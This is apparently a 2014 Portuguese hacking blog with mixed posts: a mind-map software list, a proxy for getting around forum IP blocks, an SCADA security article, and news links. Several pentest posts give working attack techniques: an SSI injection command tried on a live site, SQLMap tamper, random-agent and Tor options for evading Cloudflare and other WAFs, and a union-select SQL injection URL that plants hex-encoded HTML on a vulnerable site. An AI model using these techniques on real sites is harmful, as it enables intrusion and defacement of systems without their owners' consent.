– root@injetionsec:~#

Lista de softwares – mapas mentais

06.09.2014 (6:46 pm) – Filed under: Dicas ::

Bem galera dando uma olhada na internet resolvi postar alguns softwares para  criação de Mapas Mentais são muito uteis para estudos, podem ser instalados no Windows, MAC e Linux,seja objetivo na criação do seus mapas assim fica mais facil de ser entendido

* MIND MANAGER

Download: http://www.mindjet.com/mindmanager/

* MIND MAPR

Download: https://chrome.google.com/webstore/detail/mindmapr/njkigggmlihigheckmmebgogbgdmllpo

* COGGLE

Download: http://coggle.it/

* EASYMAPPER

Download: http://www.easymapper.com.br/download.htm

* CMAP TOOLS

Download: http://cmap.ihmc.us/download/

* MIND MEISTER

Download: http://www.mindmeister.com/pt

* MIND NODE

Download: www.mindnode.com

* FREE MIND

Download : http://freemind.sourceforge.net/wiki/index.php/Download

* XMIND

Download: http://www.xmind.net/download

* FREE PLANE

Download: http://freeplane.sourceforge.net/wiki/index.php/Main_Page

Existem mais programas para essa aplicação de mapa mentais,mas vamos ficar por aqui galera,espero que tenham gostado.

=)

Bloqueio de IPs em forum

05.09.2014 (1:55 pm) – Filed under: Dicas ::

Muitos foruns de sec,programação,hacking em geral bloqueiam os IPs dependendo da região como :

AG, AL, AR, AZ, BD, BH, BR, POR, BG, BO, CG, CN, CL, CM, CO, CZ, DZ, CE, EE, FI, GH , GE, HK, IR, ID, IL, IQ, JO, KH, KR, KZ, LK, SC, LV, LT, MA, MN, MR, MU, MY, MT, NG, PS, PA, PK, PE , PY, QA, RU, SG, SO, SR, TH, TN, TJ, TW, UA, UY, VE, VN, ZA

Encontrei esses dias um proxy que tem dado certo

http://unblocksit.es/unblock/[site.com]

=)

Rede SCADA, proteção garante o faturamento

05.09.2014 (12:12 pm) – Filed under: Rede Industrial ::

Nos últimos tempos, os executivos começaram a perceber a importância e urgência de proteger as suas redes de controle de processos. O Stuxnet, por exemplo, um worm de computador projetado especificamente para atacar sistemas de controle de processos industriais, abriu caminho para mostrar o que é possível fazer por profissionais. Mais recentemente, o Duqu entrou no mercado de ameaças permitindo que os invasores roubem dados dos fabricantes de sistemas de controle de processo industrial e utilizem esses dados para explorar as entidades que usam esses sistemas.

Mas, por que essas redes são suscetíveis a ataques? A grande maioria das empresas possui departamentos especializados responsáveis pela proteção de duas redes-chave: Data Centers (servidores) e Workstations (estações de trabalho). No entanto, uma “terceira rede”, a de controle de processos, ainda precisa receber o mesmo nível de atenção.

Frequentemente chamadas de redes SCADA (Supervisory Control and Data Acquisition) devido à sua associação com processos industriais, essas redes se conectam a equipamentos ao invés de computadores e aos sistemas de suporte ao invés de pessoas.

Em setores como serviços públicos, transportes, logística, manufatura e indústria farmacêutica, essas redes são essenciais para o funcionamento da organização. Em serviços públicos, por exemplo, elas são tão importantes que são consideradas parte de uma infraestrutura crítica nacional. Já na área de logística, são responsáveis por encaminhar milhões de encomendas por dia. Em algumas empresas essa rede opera nos bastidores, intermediando o acesso aos prédios, controlando o ar-condicionado, elevadores e refrigeração de um data center.

As redes SCADA são consideradas as redes mais desprotegidas e, por isso, estão na mira dos cibercriminosos. Se eles conseguem o acesso, podem trazer consequências prejudiciais às empresas, seus clientes e até à população em geral, o que seria extremamente perigoso.

O que faz com que essas redes sejam mais vulneráveis?

Alguns fatores que tornam essas redes mais vulneráveis são:
• As ameaças estão se tornando mais sofisticadas. Se antes os motivos eram amadores, agora estão relacionados, em forma de ‘hacktivismo’, à política, espionagem e agressão ao Estado. As ameaças persistentes avançadas – as profissionais – estão impulsionando o surgimento de um novo nível de ataques complexos e furtivos, difíceis de identificar e ainda mais de desativar;
• As redes estão se tornando cada vez mais conectadas, na medida em que as empresas estão sedentas por obter dados que permitam uma melhor tomada de decisão e fornecedores que habilitem tudo na internet com o objetivo de diminuir os custos de suporte e aumentar a retenção de clientes;
• Projetadas em uma época diferente, as redes de controle de processos têm sido consideradas inerentemente seguras e muitas vezes não incluem noções básicas de segurança. Quando divulgados por fornecedores de sistemas, os patches de correção são difíceis de se implementar devido às exigências de disponibilidade do sistema;
• A rede SCADA é frequentemente ‘invisível’ e não recebe a atenção e investimento necessários para aumentar o nível de segurança compatível com o aumento das ameaças;
• Na maior parte das organizações, os engenheiros de controle de processo gerenciam a rede de processo de controle industrial, enquanto o departamento de TI gerencia as demais redes. Esses dois grupos possuem demandas e prioridades distintas.

Dada a separação típica de funções, quando consideramos que as empresas de soluções de segurança deveriam mudar seu pensamento em relação a “Segurança da TI”, falamos que elas deveriam mudar a forma de considerar as prioridades e necessidades específicas dos engenheiros de controle de processos responsáveis por gerenciar a rede SCADA. Em primeiro lugar, as ferramentas de segurança não devem interferir nos processos de circuito fechado, pois podem colocar em risco o controle. Em segundo lugar, a disponibilidade/tempo de atividade da rede é o mais importante objetivo da rede. Em terceiro lugar, as políticas de alteração regulares de senha podem pôr em risco a empresa, bloqueando o acesso dos engenheiros de um sistema. E em quarto lugar, as ferramentas de segurança que exigem acesso direto à internet não são redes viáveis, pois muitas redes de controles são bloqueadas por Firewalls.

Ao mesmo tempo, as redes de controle de processos têm várias áreas de vulnerabilidades que devem ser protegidas. A Interface Homem-Máquina (em inglês, The Humam Machine Interface), os servidores de processos e históricos são normalmente baseados em Microsoft Windows e são pontos potenciais de entrada para qualquer invasor que tenha acesso através da rede corporativa e que esteja utilizando exploits conhecidos. A Unidade Terminal Remota (RTU) e Controladores Lógicos Programáveis (CLPs) são muitas vezes proprietários e exigem conhecimento sofisticado no sistema de controle para que seja possível a invasão, como acontece com o Stuxnet e Duqu.

As seguintes diretrizes podem ajudar as empresas a identificar as soluções de segurança que respeitem as exigências e prioridades do processo de controle de ambiente de rede, ao mesmo tempo em que reforçam sua proteção. As empresas devem pensar em soluções que podem:
• Fornecer a flexibilidade para operar de modo passivo ou in-line sem interromper o processo de circuito fechado, mesmo quando acontece alguma falha no software, hardware ou energia;
• Apoiar uma vasta biblioteca de normas e em formato de código aberto para aceitar conjuntos de regras SCADA, além das normas determinadas pelas agências do governo, outras regras de terceiros e proprietárias, únicas para a rede da própria empresa;
• Controlar o uso da rede por aplicação, usuário e grupo como uma forma ideal de segregar zonas de controle de rede para obter a máxima flexibilidade;
• Prover a descoberta passiva de dispositivos, avaliação automática de impacto e ajuste de regras para tomar uma ação corretiva somente nas ameaças que são relevantes para uma rede específica da empresa;
• Oferecer monitoramento e gerenciamento centralizados para unificar funções críticas de segurança de rede, agilizar a administração e resposta.

Os processos de controle de rede e sua segurança são de extrema importância. Cada vez mais no radar dos invasores profissionais, é a vez da rede SCADA simplificar o gerenciamento da empresa e obter a atenção e proteção que merece.

y98h

 

* Matéria originalmente publicada na revista Mecatrônica Atual; Ano:11; N° 58; Set/ Out – 2012

 

Matéria – Mikko Hyppönen diz “A Privacidade Morreu”

03.09.2014 (3:04 pm) – Filed under: Noticias ::

Um dos maiores especialistas em segurança digital do mundo, Mikko acredita que empresas como Google ou Facebook mataram a privacidade enquanto governos e suas agências de inteligência (…) veja matéria completa galera

=)

Case térmica para iPhone pode ser usado para roubar o seu PIN de ATM

03.09.2014 (2:59 pm) – Filed under: Noticias ::

Bem como deveriam também,os nossos telefones contêm uma quantidade cada vez maior de dados sensíveis de nos,esses iPhones em nossos bolsos podem ser alvos atraentes, mas eles também podem ser ferramentas para quem quer roubar seus dados,veja essa máteria  muito interessante,essas cases estão sendo vendidas la fora por volta de U$ 600,00 obamas.

SSI injection com mensagem subliminar

03.09.2014 (1:49 pm) – Filed under: Humor,Pentest ::

Os atacantes e especialistas em segurança digital estão sempre tentando encontrar alguma vulnerabilidade durante testes e auditorias,como sabemos galera existe diversos tipos de ataques que exploram a execução de comandos remotos ou a injeção de códigos, sendo um deles o Server Side Includes (SSI) Injection, analisando um site percebi que estava vull á SSI injection, ao tentar injetar comando arbitrários, recebi essa mensagem subliminar ..ahahahah..para melhor visualização clique em cima da mesma.

2309r9i3

Comando executado :
<!–#exec cmd=”ls -lh” –></pre>  

Recebo um redirecionamento,como mostrado no navegador.

http://nsa.gov/?I+AM+A+HACKER+AND+I+WAS+TRYING+TO+BREAK+INTO+A+SITE+WITH+SSI+INJECTION+EXEC+CMD+TYPE
+ATTACK+AND+SO+THEY+SENT+ME+HERE.+PLEASE+COME+FIND+ME

Traduzindo

http://nsa.gov/Sou um hacker e estava tentando invadir um site com SSI INJECTION executando o CMD como ataque e por isso mandaram-me aqui. Por favor, venha me encontrar

Comédia de mais ….ahahahah …. ;D

SQLMap em sites com proteção

02.09.2014 (9:53 pm) – Filed under: Pentest ::

Quando você suspeitar que seu site de destino é vulnerável a SQLi e você descobrir que ele é protegido por Cloudflare,você ainda pode explorar o alvo. 

1o – Você vai ter que adicionar ao SQLMAP “- – identify-waf” ou “- -check-waf” para confirmar se o alvo usa mesmo cloudflare,no então você não pode definir “- – thread=” maior do que 1 ou você vai receber o seguinte erro “403 Forbidden” se isso acontecer você vai ter que usar o TOR ou algum outro proxy para conseguir acesso ao site alvo

2o – você vai ter que add  “- -tamper=’between,randomcase,space2comment'” e “-v 3” se o alvo for confirmado que tem proteção cloudflare você pode add ainda caso necessário “- -random-agent” and “- -tor”

3o – não use o SQLMAP do Kali Linux pois ele não tem os scripts instalados do WAF pre-instalados,para isso você vai ter que baixar a ultima versão da seguinte forma:

git clone https://github.com/sqlmapproject/sqlmap.git

Essa dica pode ser aplicada a com WAFs, IDSs e IPSs, como mod_security ou outro cloudflares

Exemplo:

88u09

 

E isso ai galera ;D

SQLi add nome

02.09.2014 (1:10 pm) – Filed under: Pentest ::

Galera estou estudando um pouco sobre SQLi mas não e usando havij ou SQLMAP …kkk.. e na unha mesmo, tem muita coisa legal que da para fazer 😉

Estou um pouco apertado esses dias, vou ensinar como colocar seu nome:

– Encontrar um site com vull em SQLi
– Ache a coluna vulnerável
– Selecione a coluna vulnerável,vamos add esse código em HTML :
<fontcolor=”red”> qual quer coisa </fonte>

– E depois vamos encodar esse codigo em hexadecimal como imagem

4409riu4

Ficara da seguinte forma encodado

3c666f6e74636f6c6f723d22726564223e206279203375203c2f666f6e743e

http://www.sitevull.com/carros.php?id=17+union+select+1,2,concat_ws(0x20,0x3c666f6e74636f6c6f723d22726564223e20
6279203375203c2f666f6e743e
),4,5,6,7

ooncat_ws , ele concatena com separador,ele é muito semelhante à função CONCAT, mas aceita o separador como primeiro argumento,exemplo
select concat_ws ( ‘|’ , ‘zeze’ , ‘jaozim’ , ‘maria’ );

O resultado ficaria da seguinte forma :
zeze | jaozim| maria

Veja um exemplo encodei <fontcolor=”red”> teste vull </fonte>

440uqsduyfiu4

 

Espero que tenha gostado galera 😉

 

GitBook cria documentação

01.09.2014 (5:34 pm) – Filed under: Dicas ::

GitBook é uma excelente ferramenta para criação de documentação de projetos e livros técnicos usando Markdown e Git/Github . Anexa exemplos e exercícios interativos (atualmente suporta apenas JavaScript) e depois você pode publicá-las online via Github ou qualquer outro web hosting,mais informações veja a matéria completa